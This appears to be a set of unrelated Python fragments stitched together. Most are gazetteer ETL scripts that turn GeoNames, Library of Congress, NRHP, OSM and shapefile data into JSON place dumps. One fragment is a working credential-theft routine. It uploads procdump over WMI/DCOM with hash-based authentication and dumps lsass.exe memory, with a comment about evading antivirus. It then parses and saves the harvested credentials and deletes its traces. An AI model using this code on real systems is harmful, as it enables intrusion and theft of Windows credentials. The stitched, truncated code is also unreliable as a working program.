def generate_history(gz_file, dump_path, place_index): f = gzip.open(gz_file, 'rb') uid = uuid.uuid4() unique_name = uid.hex dump = Dump(dump_path + "/historydump/history" + unique_name + ".%04d.json.gz") histindex = place_index + "-history" #i.e. gazetest2-history for line in f: index_json = line doc_id = json.loads(index_json)["index"]["_id"] doc_json = f.next() #nextline doc = json.loads(doc_json) digest = hashlib.sha1(json.dumps(doc, sort_keys=True)).hexdigest() #SAVE HISTORY (the records tied to a place which have revisions) history_doc = { "index": place_index, "type": "place", "id": doc_id, "revisions": [{ "user_created": "ETL", "created_at": time.time(), "digest": digest }] } dump.write_bulk(histindex, "place", doc_id, history_doc) f.close() dump.close()
"source": source, "alternate": alternates, "updated": updated, "uris": [uri], "relationships": [], "timeframe": timeframe, "admin": [], "address": address } dump.write(uri, place) if __name__ == "__main__": shapefile, dump_path = sys.argv[1:3] #simplify_tolerance = .01 # ~ 11km (.001 = 111m) simplify_tolerance = None uri_name = "http://maps.nypl.org/warper/layers/861" dump_basename = os.path.basename(shapefile) dump = Dump(dump_path + "/shapefile/" + dump_basename + ".%04d.json.gz") extract_shapefile(shapefile, uri_name, simplify_tolerance) dump.close() #python shapefile.py "/path/to/shapefile/buildings.shp" /path/to/gz_dump #python nyc_perris_digitizer_csv.py ../../../GazetteerData/Manhattan\ Buildings\ Perris\ 10_23_2012/FinalCleanedData_Perris1854_tab.csv nydump
"updated": updated, "uris":[uri], "relationships": [], "timeframe":timeframe, "admin":[] } dump.write(uri, place) if __name__ == "__main__": csvfile, dump_path = sys.argv[1:3] #simplify_tolerance = .01 # ~ 11km (.001 = 111m) simplify_tolerance = None uri_name = "http://nrhp.focus.nps.gov?referenceNumber:" #http://nrhp.focus.nps.gov/natregadvancedsearch.do?referenceNumber:73001435 dump_basename = os.path.basename(csvfile) dump = Dump(dump_path + "/json/"+ dump_basename + ".%04d.json.gz") extract_geojson(csvfile, uri_name, simplify_tolerance) dump.close() #python nrhp.py nhrp.csv nrhpdump #python nrhp.py "/path/to/directory" /path/to/gz_dump2
def run(self, addr, osArch='64'): dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost) try: iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login) iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) iWbemLevel1Login.RemRelease() win32Process, _ = iWbemServices.GetObject('Win32_Process') self.shell = RemoteShell(self.__share, win32Process, self.__smbConnection) # Upload procdump procpath = os.path.join( os.path.dirname(os.path.realpath(sys.argv[0])), 'misc', 'procdump', 'procdump%s.exe' % (osArch)) logging.info("%s Uploading procdump to %s..." % (debugBlue, addr)) if logging.getLogger().getEffectiveLevel() > 10: with suppress_std(): self.shell.do_put(procpath) else: self.shell.do_put(procpath) dt = datetime.now().strftime("%m-%d-%Y_%H-%M-%S") # Execute procdump silently with pid to avoid AVs as much as possible cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do procdump{}.exe -accepteula -ma ^%B C:\\{}.dmp""".format( osArch, addr + "_" + dt) logging.info("%s Executing procdump on %s..." % (debugBlue, addr)) if logging.getLogger().getEffectiveLevel() > 10: with suppress_std(): self.shell.onecmd(cmd) else: self.shell.onecmd(cmd) # Create dump's file descriptor to parse dumps remotely logging.info("%s Creating dump's file descriptor on %s..." % (debugBlue, addr)) logging.info("%s Parsing %s's dump remotely..." % (debugBlue, addr)) dump = Dump(self.__smbConnection, """{}.dmp""".format(addr + "_" + dt)) credentials = parseDump(dump) if credentials is not None: print_credentials(addr, credentials) write_credentials(addr, credentials) finally: # Clean remote machines (dump & procdump) logging.info("%s Closing dump file on %s..." % (debugBlue, addr)) dump.close() logging.info("%s Deleting procdump on %s..." % (debugBlue, addr)) if logging.getLogger().getEffectiveLevel() > 10: with suppress_std(): self.shell.onecmd("del procdump%s.exe" % (osArch)) else: self.shell.onecmd("del procdump%s.exe" % (osArch)) logging.info("%s Deleting dump on %s..." % (debugBlue, addr)) if logging.getLogger().getEffectiveLevel() > 10: with suppress_std(): self.shell.onecmd("del %s.dmp" % (addr + "_" + dt)) else: self.shell.onecmd("del %s.dmp" % (addr + "_" + dt)) if self.__smbConnection is not None: self.__smbConnection.logoff() dcom.disconnect() sys.stdout.flush()
def extract_geonames(data_path, dump_path): alt_names = tab_file(data_path + "/alternateNames.sorted.txt", columns["alternate"]) geonames = tab_file(data_path + "/allCountries.sorted.txt", columns["geoname"]) dump = Dump(dump_path + "/geonames/geonames.%04d.json.gz") extra_alt_name = {} for geoname in geonames: alt_name_list = [] if extra_alt_name.get("geoname_id") == geoname["geoname_id"]: alt_name_list.append(extra_alt_name) extra_alt_name = {} for alt_name in alt_names: if alt_name["geoname_id"] == geoname["geoname_id"]: alt_name_list.append(alt_name) else: extra_alt_name = alt_name break geoname["alternate_names"] = alt_name_list try: for col in ("latitude", "longitude"): geoname[col] = float(geoname[col]) except ValueError: ### busted coordinates continue centroid = [geoname["longitude"], geoname["latitude"]] population = None try: population = int(geoname["population"]) except ValueError: pass uri = "http://geonames.org/" + geoname["geoname_id"] names = [] alt_name_list.append({ "name": geoname["name"], "lang": "", "type": "preferred" }) for alt_name in alt_name_list: name_type = "" if alt_name.get("is_colloquial"): name_type = "colloquial" if alt_name.get("is_historic"): name_type = "historic" if alt_name.get("is_preferred"): name_type = "preferred" if alt_name.get("is_short"): name_type = "short" alt_name = { "lang": alt_name["lang"], "type": name_type, "name": alt_name["name"] } names.append(alt_name) ascii_name = transliterate(alt_name) if ascii_name: names.append(ascii_name) place = { "name": geoname["name"], "centroid": centroid, "feature_code": geoname["feature_code"], "geometry": { "type": "Point", "coordinates": centroid }, "is_primary": True, "source": geoname, "alternate": names, "updated": geoname["changed_at"], "population": population, "uris": [uri], "relationships": [], "timeframe": {}, "admin": [] } dump.write(uri, place) dump.close()
def extract_lc_auth(data_path, dump_path): dump = Dump(dump_path + "/lc_auth/lc_auth.%04d.json.gz") for line in file(data_path): auth = json.loads(line) if "isMemberOfMADSScheme" in auth: del auth["isMemberOfMADSScheme"] if "adminMetadata" in auth: del auth["adminMetadata"] alt_names = [] #print "hasVariant: ", auth.get("hasVariant") for label in get_labels(auth.get("hasVariant")): alt_names.append({"name": label}) for label in get_labels(auth.get("hasEarlierEstablishedForm")): alt_names.append({"name": label, "type": "historical"}) geom = fcode = None has_source = auth.get("hasSource") if has_source: note = has_source.get("citation-note") if note: lat = coords_to_dms(ns_coords, note) lon = coords_to_dms(ew_coords, note) if lat and lon: geom = {"type": "Point", "coordinates": [lon, lat]} # search the citation-note fcode = extract_fcode(note) if not fcode: source = has_source.get("citation-source", "") fcode = extract_fcode(source) if not fcode: fcode = "AUTH" uri = auth["id"] if "authoritativeLabel" not in auth: continue updated = datetime.datetime.utcnow().replace( second=0, microsecond=0).isoformat() auth_source = {} auth_source = { "type": [], "id": "", "authoritativeLabel": "", "note": "", "editorialNote": "" } for key in auth_source.keys(): if auth.has_key(key): auth_source[key] = auth[key] place = { "name": auth["authoritativeLabel"], "feature_code": fcode, "alternate": alt_names, "is_primary": True, "updated": updated, "source": auth_source, "uris": [uri], "relationships": [], "timeframe": {}, "admin": [] } if geom: place["geometry"] = geom place["centroid"] = geom["coordinates"] else: place["geometry"] = {} place["centroid"] = [] dump.write(uri, place) dump.close()
names.append(ascii_name) source = dict(row) for key in source.keys(): if not source[key] or key in ("geojson", "centroid_x", "centroid_y", "way"): del source[key] place = { "name": preferred_name, "centroid": centroid, "feature_code": feature_code, "geometry": geometry, "is_primary": True, "source": source, "alternate": names, "updated": row["timestamp"], "uris": [uri], "relationships": [], "timeframe": {}, "admin": [] } dump.write(uri, place) if __name__ == "__main__": import sys database, dump_path = sys.argv[1:3] dump = Dump(dump_path + "/osm/osm.%04d.json.gz") extract_osm(database, "planet_osm_point", "node", dump) extract_osm(database, "planet_osm_polygon", "way", dump) dump.close()